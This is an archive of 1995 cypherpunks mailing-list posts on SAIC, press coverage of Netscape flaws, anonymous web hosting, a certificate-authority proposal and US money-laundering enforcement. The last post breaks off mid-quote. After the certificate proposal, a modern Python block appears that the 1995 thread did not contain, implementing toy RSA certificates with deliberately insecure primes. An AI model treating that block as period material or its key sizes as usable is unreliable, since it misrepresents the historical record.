Subject: Re: SAIC bought InterNic, but who is SAIC? A spook contractor!
In-Reply-To: <199510111853.OAA26654@ncrhub5.attgis.com>
Message-ID: <Pine.SV4.3.91.951011192135.17718F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I used to work for SAIC. It's a legitimate beltway-bandito contractor. To 
call it a cover op is sort of missing a point. The government hardly ever 
does _anything_ itself (as, say, percentage of budget). Contractors are 
the ones who do the dirty work in the trenches.

SAIC is very widely dispersed. Each field office is responsible for 
getting its own contracts.  Hardly any revenue flows down from HQ to the 
field offices. My boss used to say, "this place is like a McDonalds".

As we speak, the US Navy is busy dis-establishing its Shore 
Establishment. Cost savings. The same people will do the same jobs - they 
will have merely been hired by contractors.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 17:18:53 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <199510120018.UAA16359@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   There's a strange anxiety in Markoff's story, as though it
   was planted on page one to exaggerate a threat to cyber law
   and order. Reminds that his articles on Kevin were also
   melodramatic, himself a player, privileged to join the
   hunt. Maybe this is ambient hot material for his burbling
   potboiler on Shimomura and Mitnick, honing an author's
   creative edge, and artistic license, over that, ahem, of
   the tranquil and capaciously befriended journalist's, pissed
   that privileged news files were hacked, are hackable.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 12:30:47 PDT
To: cypherpunks@toad.com
Subject: Pointer to 10/9/95 EE Times Article
Message-ID: <199510111930.UAA29409@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, llange@eet.cmp.com

Front Page:
`Cypherpunks' asked to breach Netscape, Microsoft security
Desperately seeking hackers

Quotes from Sidebar (How the `Cypherpunks' mailing list works):

"When The New York Times announced a security flaw in Netscape
 Communications Corp's World Wide Web browser software a few weeks
 ago, the `Cypherpunks' hit the big time."

This may be true.  Companies are now asking for their products
to be brutalized by the Cypherpunks' to help ensure security!
This could not be said even a few mere weeks ago.

"According to the group's moderator, who prefers to remain anonymous,
 `The most important means to the defense of privacy is encryption.
 Cypherpunks are therefore devoted to cryptography.  They wish to learn
 about it, to teach it and to implement it.'"

Ok, since when is the Cypherpunk's mailing list moderated?

It is apparent that the author, Larry Lange, has never studied the
list closely or he would know how amusing this sounds...

(Geez, if he had ever read one of Tim May's posts on the subject... :-)

Oh well, at least, I was amused.

Regards,
Loren

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHwRFv8de8m5izJJAQEzWgP+LCPtBBH+hz0yqOG2MfduNyGK0kM6gHfN
H/ZRZ11z2CExCZiJxRma6MhR/nRmgSePxGWMq/DfbUziUsuNwuJwN/PEEJtAXWTa
dJ3FEhUaZbVlhBJK5Um1M0SeZPqiLCQH9K0DJNE0FevrJed/3MAft+owYTk2NQ+H
oXDwXtFrTbw=
=UGHU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 20:36:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <v02120d04aca21d2bcd71@[199.2.22.120]>
Message-ID: <307C8C5C.4F34@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes wrote:
> It is profoundly irritating to find this splashed on the
> front page of the NYT, contributing to the FUD that
> largely benefits luddites like First Virtual and
> those, like MS$, pushing for a return to proprietary networks.
> (One quote from FV marketing director Pierre Wolfe at the ML
> conference I recently attended, "The Internet may end up
> as a ghetto, where people are afraid to engage in commercial
> activity.")

  It is a fact of life now that there are many journalists
lurking on cypherpunks, and other places on the net.  I have
been directly contacted by three reporters just in the past
week.  Our PR department tells me that cypherpunks, and my
name, are routinely mentioned by reporters these days.  I've
seen my postings to this list quoted without my prior knowledge
in at least one news article.

  I wish that folks sending to this list would realize this
new world exists, as much as it sucks, and spend a bit more time
double checking before posting anything alarmist.  In particular,
there have been several recent false alarms regarding netscape
security sent to this list and others.  While I don't want to sweep
real security holes under the rug, I think it hurts both cypherpunk
and netscape interests for false claims to be coming out of this
list.  

  Just to make things clear, I'm not an official spokesperson
for Netscape and anything sent to this list is my personal opinion.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Wed, 11 Oct 95 18:38:38 PDT
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: anonymous web pages?
Message-ID: <v02130500aca22166f237@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 PM 10/11/95, Nelson Minar wrote:
>The hard part would be finding a site that would be willing to serve
>anonymous pages. I don't understand the politics at various sites that
>allow anonymous remailers: maybe this isn't much harder?

Yes, it is "much harder". Unless the site had a cache of all the pages that
it was willing to source (the usual case), traffic analysis could easily be
applied to determine the sources for pages because, unlike mail which is
"store and forward", web pages are provided on a realtime connection.

----
Richard Wackerbarth
rkw@dataplex.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 20:52:56 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C8C5C.4F34@netscape.com>
Message-ID: <199510120347.UAA27336@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I wish that folks sending to this list would realize this
> new world exists, as much as it sucks, and spend a bit more time
> double checking before posting anything alarmist.  In particular,
> there have been several recent false alarms regarding netscape
> security sent to this list and others.  While I don't want to sweep
> real security holes under the rug, I think it hurts both cypherpunk
> and netscape interests for false claims to be coming out of this
> list.  

	I completely agree that the reporters on this list make things
very difficult and people do need to be very careful about posting
things which will get misinterpreted by reporters.. but--

	This list is -not- an "announcement" list. If I see a
potential bug, I want other cypherpunks to tell me whether I am onto
something or not, so I would post. If some idiot reporter takes that
and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
REPORTING-.
	I understand though, that we can't control what the reporters
say and how they interpret what we say. It is very important to word
your posts carefully such that when you post a bug a reporter won't
think that they should write an article on it until it is verified.
	It's very sad, though, that we have to be very careful about
what we post now because of the media attention. I would prefer if the
list could just be a forum where we can discuss things, but that is
not the case.

> 
>   Just to make things clear, I'm not an official spokesperson
> for Netscape and anything sent to this list is my personal opinion.
> 

	As if that is going to help when a reporter sees your
post. "Jeff Weinstein, Electronic Munitions Specialist at Netscape,
said, 'XXXX'" -- doesn't put you down as "spokesperson for netscape",
and doesn't contain any factual errors, but is damn misleading and
makes it sound like you are speaking for Netscape... I guess I'm
rather lucky being in charge of a sole proprietorship-- there isn't
very much difference between me speaking for myself and speaking for
my business. (There are some differences, yes, but very small.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 11 Oct 95 12:49:24 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <9510111948.AA00815@elysion.eiss.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


I was busy in the last days and didn't keep track of the certificate
discussion. I just read most of the discussion all at once. 

- There was some discussion about the bindings between the key and the
  real world attributes of the key owner.

  Under normal circumstances communication never happens without an
  originator. If the originator uses some kind of security feature, he
  normally doesn't do it just for fun. He uses it as a tool to give
  the communication certain properties.

  Authenticity and confidentiality don't make sense without knowing
  anything about the key owners. There is no use in having a signature
  as long as you don't know anything about the signator. And there is
  no use in encrypting messages as long as you don't know anything
  about the receiver. 

  A digital signature is only the way to say who wrote the
  message. "Knowing the author" is the sense of the signature, not just
  having the signature. "Knowing" means know enough attributes about
  him. Same with encryption.

  Knowledge of the author may, of course, be quite bizarre, as well as
  the author itself. But security is always in context of some
  knowledge about the other side. 

  It doesn't make much sense to communicate with a
  "smith@somewhere.edu", because this is not enough information to get
  sufficient knowledge of the key owner. There are a lot of people
  named smith being able to legally have this address. And it doesn't
  make sense to communicate with Bob, "Bob" or ISP+Bob, as long as the
  name Bob is not sufficient to provide enough information.

  I need to be able to get any knowledge about the key owner that
  could be a reason to be interested in communicating with him. I
  do not want to talk with bob because he is one of many Bobs. I want
  to talk with him because he is the Bob with phone number 123, red
  hair and living in XY street. 

  Therefore, a certificate must be able to provide any information
  that could be required for the decision whether the key owner will
  be accepted as a communication partner.

  Obviously, the information depends on the nature of the key owner
  (human, machine, committee etc.)

- Under normal circumstances communication has an originator and
  in most cases an addressee. If you can talk to an addressee, you usually
  have some kind of address to locate him. But perhaps you don't have
  more than the address, not even a public key. Thus the address to
  communicate should also be good to locate the public key of the
  addressee (or the keys of all key owners listening on that address).

  Therefore, the communication address should be enough to locate a
  key server and to retrieve the key (or a small number of possible
  keys) for that address. After retrieving the keys, the originator of
  communication can decide whether there is a key sufficiently
  identifying his communication partner.

  Consequently, the key certificate should contain the communication
  address of the owner. It is helpful if the address is unique.

  For a human this may be the email address. For a machine it may be
  the DNS host name or the internet address. For a service (WWW-site)
  or an organization it may be the email address.

  The communication address must allow to locate the key server. The
  only existing infrastructure allowing this in internet is the
  DNS. If you have an email address, hostname or IP address, you can
  find the appropriate DNS server. The server should be able to help
  you. Best way to do this is to provide the address of a key
  retrieval system (similar to the MX record).

  Use the communication address of the key owner as a searchable index
  for the key.

  Inventing a MD5 hash sum as key index is useless and doesn't make
  sense in my eyes. It just creates the problem of knowing the index
  and typo errors.

- A MITM between two communication partners can be avoided by
  appropriate protocols as long as there is a sufficient key management
  structure.

- A MITM between a key owner and the certification authority is a
  problem, but a solvable one.

  I don't like the separation of creating the key and attaching
  attributes. The MITM can attack between. There is always the
  problem of managing all attached attributes. When the first
  attribute is attached to the key, the key doesn't have any other
  attributes. This makes it vulnerable.

  It is better to combine the key and its attributes _before_ creation of the
  key. If the attributes are not attached, but an essential part of
  the key, there is no hole for the MITM. If key and certification are
  two things, there is the problem of bringing them
  together. Self-certified keys don't have this problem. (RFC 1824)

- There is also the question whether the key attributes can be trusted to
  describe the real key owner well enough. This implies that someone
  must check the attributes and participate in attaching the attribute
  or creating the self-certified key. PGP uses key signatures to do
  so, but there is not much information attached, just
  name/e-mail-address. 

  As said before there might be interest in describing the key owner
  in other ways. The authority signing the key must be able to check
  the description of the key owner. An unorganized web of trust (trust
  in what? signator knows key owner?) isn't suitable. One reason is
  that there is much too much overhead in finding a path of trust in
  the web and storing or retrieving the keys while searching for the
  path.

  There must be a systematic, hierarchical organization of authorities
  which check the key attributes. (We call them SKIA : Secure Key
  Issuing Authority, see RFC 1824).



So I would suggest the following:

We create a hierarchy of SKIAs able to check certain
attributes. E.g. hostnames and IP addresses might be checked by the
same authorities which allow to use them. 

Key attributes are a composition of the communication addresses of the
key owner and his natural attributes a communication partner might be
interested in while identifying the peer. 

Key owner and SKIA create a combination of key and attributes.

The key owner deposits his key on all key servers responsible for his
comm. addresses.

If you communicate with someone known at least by his communication
address (otherwise you couldn't communicate), you can easily retrieve
all possible public keys of all key owners able to use this
address. Now you can decide and choose the key with appropriate
attributes (bank account number or whatever).

Any comments?

Hadmut
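
The lookup flow proposed in the message above (address, then DNS, then key server, then a choice among candidate keys by attribute) can be sketched as follows. This is an added example, not code from the post or from RFC 1824: the "KX" record type, the server name, the key strings and the attribute values are hypothetical, and a toy RSA signature over key and attributes together stands in for the self-certified keys the post refers to.

```python
import hashlib
import json

# Toy RSA key for the example SKIA: two Mersenne primes, far too small for
# real use, chosen only so the example runs on the standard library.
P, Q, E = 2**61 - 1, 2**89 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # SKIA private exponent


def digest(owner_key, attributes):
    """Hash the key and its attributes as one canonical object, so neither
    can be swapped without changing the value that gets signed."""
    blob = json.dumps({"key": owner_key, "attrs": attributes}, sort_keys=True)
    return int.from_bytes(hashlib.sha256(blob.encode()).digest(), "big") % N


def skia_issue(owner_key, attributes):
    """The SKIA has checked the attributes out of band; it signs the key and
    attributes together rather than attaching attributes afterwards."""
    return {"key": owner_key, "attrs": attributes,
            "sig": pow(digest(owner_key, attributes), D, N)}


def skia_verify(cert):
    return pow(cert["sig"], E, N) == digest(cert["key"], cert["attrs"])


# Constructed data. "KX" is a hypothetical record type, by analogy with MX.
DNS = {"somewhere.edu": {"KX": "keys.somewhere.edu"}}
SMITH_A = skia_issue("PUBKEY-SMITH-A", {"phone": "123", "hair": "red"})
SMITH_B = skia_issue("PUBKEY-SMITH-B", {"phone": "456", "hair": "grey"})
# Smith A's attributes re-attached to someone else's key: the signature
# no longer matches, which is the gap the post wants closed.
FORGED = dict(SMITH_A, key="PUBKEY-MALLORY")
KEY_SERVERS = {
    "keys.somewhere.edu": {"smith@somewhere.edu": [SMITH_A, FORGED, SMITH_B]},
}


def locate_key_server(address, dns=DNS):
    """Derive the key server from the communication address via DNS."""
    domain = address.rsplit("@", 1)[-1].lower()
    record = dns.get(domain, {})
    if "KX" not in record:
        raise LookupError("no key server published for " + domain)
    return record["KX"]


def candidate_keys(address):
    """All certificates filed under the address that the SKIA really issued."""
    server = locate_key_server(address)
    certs = KEY_SERVERS[server].get(address.lower(), [])
    return [c for c in certs if skia_verify(c)]


def select_key(address, required):
    """Pick the one key whose certified attributes match what the sender
    knows about the intended partner; refuse if that is not unique."""
    matches = [c for c in candidate_keys(address)
               if all(c["attrs"].get(k) == v for k, v in required.items())]
    if len(matches) != 1:
        raise LookupError("%d keys match; need exactly one" % len(matches))
    return matches[0]["key"]


if __name__ == "__main__":
    print(select_key("smith@somewhere.edu", {"phone": "123", "hair": "red"}))
```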



  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 21:04:51 PDT
To: herbs@interlog.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510120401.AA15785@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So: If you can't trust your path to your own file system, what can you
> trust?  (And this is without even talking about things like firmware
> upgrades and BIOS patches and all sorts of other potential approaches.)  Can
> we do no better than simply assume the local workstation file system can be
> trusted?
> 

Nah, it's not as bad as all that.  There's fixes to all of this, they're well
known, and actually in place at some places.  Because it's such a pain having
good security on all of the machines most sites choose to have really good
security on a firewall to keep the bad guys out, and through policy, isolation,
and less stringent security measures protect the machines inside the firewall.
That's not to say that everyone with a firewall has good security, far from it.
It's also not to say that everyone without a firewall is vulnerable, they're
not...I know folks with all of their machines buttoned up tight.  It's possible
to close most categories of holes, and to detect intrusions in progress.  You
say you're worried about the system being corrupted so that you can't trust
calls to the OS.  Some attacks do work this way, but you can prevent the attack
via a combination of good security and good practices.  And yes, secure 
authentication and transmission of data makes everything much simpler;)  Without
it you have to essentially pull up the drawbridge and trust no one outside the
moat, since there's no way of knowing if anyone, or any host is who or what they
say they are.  If anyone wants more specific information about how to protect
from various attacks I can help or give you references to the literature, but
I won't go into it here since I expect that most anyone you'd find on
cypherpunks knows all this at least in outline already.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:22:47 PDT
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: anonymous web pages?
In-Reply-To: <199510120018.SAA12399@nelson.santafe.edu>
Message-ID: <199510120417.VAA29572@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	c2.org allows people to set up anonymous web pages.
http://www.c2.org/services/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:25:37 PDT
To: rkw@dataplex.net (Richard Wackerbarth)
Subject: Re: anonymous web pages?
In-Reply-To: <v02130500aca22166f237@[199.183.109.242]>
Message-ID: <199510120420.VAA29755@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	What's so hard about finding a site to host anon web pages?
c2.org's been doing it for over a year. had the CoS threaten to sue us
over it, even.

> 
> At 7:18 PM 10/11/95, Nelson Minar wrote:
> >The hard part would be finding a site that would be willing to serve
> >anonymous pages. I don't understand the politics at various sites that
> >allow anonymous remailers: maybe this isn't much harder?
> 
> Yes, it is "much harder". Unless the site had a cache of all the pages that
> it was willing to source (the usual case), traffic analysis could easily be
> applied to determine the sources for pages because, unlike mail which is
> "store and forward", web pages are provided on a realtime connection.
> 
> ----
> Richard Wackerbarth
> rkw@dataplex.net
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:26:50 PDT
To: dvberger@eit.COM (David Berger)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120159.SAA27558@viper.eit.com>
Message-ID: <199510120421.VAA29813@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Notwithstanding, the NY Times writer took an otherwise reasonable point and
> blew it up into a "War of the Worlds" style article.  I'd make sure he
> writes a decent article before quoting me in it.
> 

	Not possible. Reporters don't call you for a quote and then
send you a draft of the article for your approval before they
publish. They call for a quote, write their article, and publish, not
asking for approval.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 21:31:40 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510120410.AA28665@sulphur.osf.org>
Message-ID: <199510120426.VAA00261@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> NO!
> 
> Something like Perry's "Do not redistribute without permission" should
> be the only modification needed.

	"should" is very different from what is.
	Hell, -no- change "should" be necessary. Reporters "should" be
aware of the issues and write good articles. But they don't. Some "Do
not redistribute w/o permission" isn't going to stop a reporter from
printing an article about your post, if they think it will get them
the front page and a raise.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 18:40:45 PDT
To: cypherpunks@toad.com
Subject: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120047.KAA13489@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510112155.A49472-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> 
> Perhaps somebody should make IDEA shorts?
> 
> Then it would be interoperable with PGP...
> (Would tooooo. You just have to remember what the header is.)

You'd still need an MD5 necktie.

(and your matching stealth sunglasses? When does this go too far?
This ridiculous looking figure is begging for its own worlds chat avatar.
Violate ITAR and good fashion in vr. Which begs the question, would anyone
notice if First Cypherpunks Bank were operating in such a networked video 
game? Now *that* would be a non-bank financial institution. I can just 
see it in court: "your honor, the disclaimer clearly says it is all a game,
the state's agents have simply suspended all disbelief". Talk about stego.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Wed, 11 Oct 95 15:55:53 PDT
To: cypherpunks@toad.com
Subject: international clampdown on money laundering
Message-ID: <9510112227.AA25400@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



 ----- Forwarded Message

Date: Tue, 10 Oct 1995 23:35:58 -0400 (EDT)
From: Brad Dolan <bdolan@use.usit.net>
To: snet-l@world.std.com
Subject: Int'l Money Laundering, Part the Second (fwd)



- ---------- Forwarded message ----------
Date: Tue, 10 Oct 1995 19:31:40 -0800
Subject: Int'l Money Laundering, Part the Second


INTERNATIONAL ASPECTS
The increasingly long arm of US law

Those of you who have read my earlier exploration on the subject
of jurisdiction (http://www.communities.com/paper/swamp.html)
should be aware of a wide variety of ways that the US can "reach
out and touch someone" they're not pleased with.

Well, last week, I learned a few more.

There are several ways in which the US is attempting to exert
hegemony throughout the world wrt banking regulation:

  o Identification of "fiscally tolerant" nations and banking
    havens, and close regulatory examination of all transactions
    with these countries.

  o Pressure on major US trading partners and allies to pass
    and implement anti-money-laundering legislation and
    regulatory regimes.

  o Regulations on foreign banks with offices in the US, making
    compliance demands on world-wide operations.

  o Criminal prosecution of banks suspected of institutional
    involvement in money laundering, even if said bank has no
    offices or branches in the US.

  o Worldwide pre-trial substitute asset forfeiture of banks
    suspected of institutional involvement in money laundering,
    even if said bank has no offices or branches in the US.


Pariah Nations in Banking
=========================

As I touched on briefly in the previous section, transactions
with well-known banking havens can automatically qualify as
"suspicious." And in addition to some of the better known havens,
a number of countries were pointed out at the conference as
being "fiscally tolerant", including Malta, Uruguay, Japan,
Ireland and Belgium; in another presentation the countries of
Eastern Europe and the former Soviet Union were identified as
"rapidly growing" sources of suspicious banking activity.

Transactions with counterparties in such countries will be flagged
by regulators for closer examination -- banks with large percentages
of transactions with these countries will be expected to meet a
higher standard in their attempt to identify "suspicious" behavior
and will be under increasing pressure to investigate their customers'
business practices and motivation for all bank transactions.

Some countries are clearly going to continue to tell the US to
"get stuffed." However, if the US is successful in pressuring more
and more countries to "toe the line", it will leave a shrinking
pool of transactions subject to closer and closer examination.


New Money Laundering Legislation
================================

Two presentations, one from Taiwan, the other from Thailand,
focused on new or proposed legislation wrt money laundering in
those countries. Based on my direct experience of living in the
former, and my research into the latter, it's going to be a very,
very long time before such legislation has a significant
impact on either country.

Chinese people (who are in the majority in Taiwan, and form
an economically active minority in Thailand) are very cash-
oriented; I vividly remember payday in Taiwan, with the boss
sitting at a table piled with money, bundling up salaries for
everyone. I'd come home at the end of each month with a giant
wad of cash from my several different jobs. One could hardly
imagine a better environment for money laundering than a society
in which large quantities of cash change hands on a regular basis.
After his talk, the Taiwanese speaker acknowledged the problems,
but seemed hopeful that progress could be made.

The speaker from Thailand, Nualnoi Treerat, a professor of
Economics, discussed the proposed legislation primarily as an
attempt to reduce the impact of organized crime on
political life and society in Thailand; however, by her own
estimations, the underground economy in Thailand represents
17-19% of the country's GDP (mostly drugs and prostitution.)
Given the extensive corruption which she also detailed, it
seems that such legislation will be a very small step indeed.

Other speakers addressed the issue of cultural differences
with respect to the use of cash and attitudes towards privacy,
and it came up at lunch both days -- in many cultures, financial
privacy is held in much higher regard than in the US, and people
have a much stronger suspicion towards the government. Furthermore,
there are many people who feel this way in the US. There is going
to be an inevitable clash between attempts to closely regulate
and monitor money movements and people's fundamental desire for
privacy. It's not clear that people of any culture can be sufficiently
frightened by the bad guys to give up as much of their privacy as
would be required for ultimate success in the War on Money Laundering.

Despite the dim chances of success, it's clear that the US has
been at least partially successful in coercing and coaxing other
countries to adopt measures against money laundering, and to
some extent there is local support for these measures. But these
direct efforts pale by comparison to some other techniques...


Foreign Bank Regulation
=======================

In various pro-privacy publications I've read, there have been
oblique warnings about doing business with foreign banks that
maintain offices in the US. At this conference, I learned some
very concrete reasons for this.

It turns out that if a foreign bank wants to open a US office,
they must demonstrate compliance with US money laundering laws
throughout their _worldwide operations_. Furthermore, they're
expected to have solid leadership for these policies from their
home offices.

This puts such banks in a serious bind. For instance, while
Annunzio-Wylie absolves (or attempts to absolve) banks from civil
liability for filing Suspicious Activity Reports and Criminal
Referral Forms on their customers, this absolution does not extend
to the home countries of these banks, where substantially different
laws may obtain -- possibly explicitly forbidding this kind of
reporting.

There is almost a certain kind of logic to this kind of activity,
but not content to extend our laws over the worldwide operations
of banks with US offices, there are two ways in which US authorities
are now attempting to extend US laws to banks _with no US offices_.


Extraterritorial Reach
======================

The best paper presented at the conference, hands down, was
"Surviving the Solution: The Extraterritorial Reach of the
United States," by Kirk Munroe, a criminal defense attorney
practicing in Miami. [I intend to find out if an online
version of this paper can be made available.]

To quote Mr. Munroe:

  The US money laundering law specifically provides for
  extraterritorial jurisdiction when (a) the conduct is by a US
  citizen anywhere in the world, or, if by a non-US citizen,
  the conduct occurs, at least in part, in the United States,
  and (b) the transactions, or a series of related transactions,
  exceeds $10,000. [18 USC § 1956(f)]

Some add'l background: banks involved in international business
typically have a number of _correspondent accounts_ scattered
around the world that are used for clearing wire transfers and
other transactions. Since the BCCI scandal, the US government
has increasingly gone after these accounts when a bank is
suspected of facilitating money laundering.

Furthermore, banks can have these correspondent accounts seized,
even if they no longer contain "dirty" money, because they
_facilitated_ a money laundering activity.

When you combine these elements, you get a strategy that
permits the US government to confiscate worldwide correspondent
accounts of banks, even if they don't have a US presence.

The first case Mr. Munroe cites is that of Banco de Occidente
(Panama), one of his clients, that was alleged to have facilitated
the laundering of the proceeds of drug transactions. The indictment
included criminal charges against the banks and a criminal
forfeiture charge. The government also filed a civil action for
the forfeiture of $412 million allegedly laundered (although it
had already passed completely through the bank.)

The government then proceeded to freeze not only the bank's US
correspondent accounts, but also accounts in Germany, Switzerland
and Canada, leading to the insolvency of the bank and its subsequent
takeover by the Panamanian Banking Commission. [The Germans quickly
unfroze the account after a civil action brought by the bank.]

Quoting Munroe:

  After months of difficult and complicated negotiations which
  involved the banks' various interests in eight nations, a
  resolution was reached with the governments of the US, Canada,
  and Switzerland... [the bank] entered a guilty plea and agreed
  to forfeit, over a period of four years, $5 million to the US.
  The US, in turn, paid the Swiss and the Canadians $1 million
  each from the initial $2 million forfeiture payment.

[Those of you who are still under any delusions about the "safety"
of Swiss bank accounts, take careful note of this.]

Mr. Munroe concludes that the only reason that the bank got off
this "lightly" was because of substantial evidence that it was,
by and large, a highly respectable institution and that this
instance of laundering was an aberration.

The next case cited by Mr. Munroe is that of Bank Leu. I quote
from his paper:

  In sum, a Luxembourg bank with no office in the US was charged
  and convicted of money laundering in the US on the basis of
  clearing US dollar negotiable instruments drawn on a US bank but
  deposited by non-US citizens in Luxembourg. In other words,
  acceptance of US-dollar negotiable instruments by a bank anywhere
  in the world outside of the US renders the bank susceptible
  to US criminal jurisdiction in the money laundering field.

The case boils down to this: Bank Leu wanted to expand its private
banking business, and hired an officer to market accounts in
South America. Two related accounts were opened, and over a one-
year period $2.3 million in cashier's checks, all below $10K,
were deposited in the two accounts.

Although no guilty knowledge could be shown, this case was pursued
and won on a theory of "willful blindness", that is, the bank "should
have known" that the transactions had no valid business purpose
and were inherently suspicious (came via Colombia, were sometimes
more than 6 months old, all in small amounts, etc.). According to a
LEA representative at the conference, there was a lot of joking in
the backoffice at Bank Leu about the money being dirty, and clerks
were repeatedly told "don't worry, it's ok" by bank officers.
Certainly if this is true, it amounts to _extremely_ willful
blindness, but this case still represents an amazingly long reach
for US laws.

[more to come... "Things bad people do with money"]





--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 11 Oct 95 22:41:47 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SOL.3.91.951011223447.25554A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Jiri Baum wrote:

> 
> If you are reading a signed message, you simply strip off the

Not a good choice of words - remember, you should never expose your 
private, er, key...

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 11 Oct 95 20:43:29 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <Pine.BSD.3.91.951011223850.13193B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Jeff Weinstein wrote:

> > I'd love to see something in there about most commercial sites being behind
> > firewalls without nfs access across the firewall.  This greatly reduces the
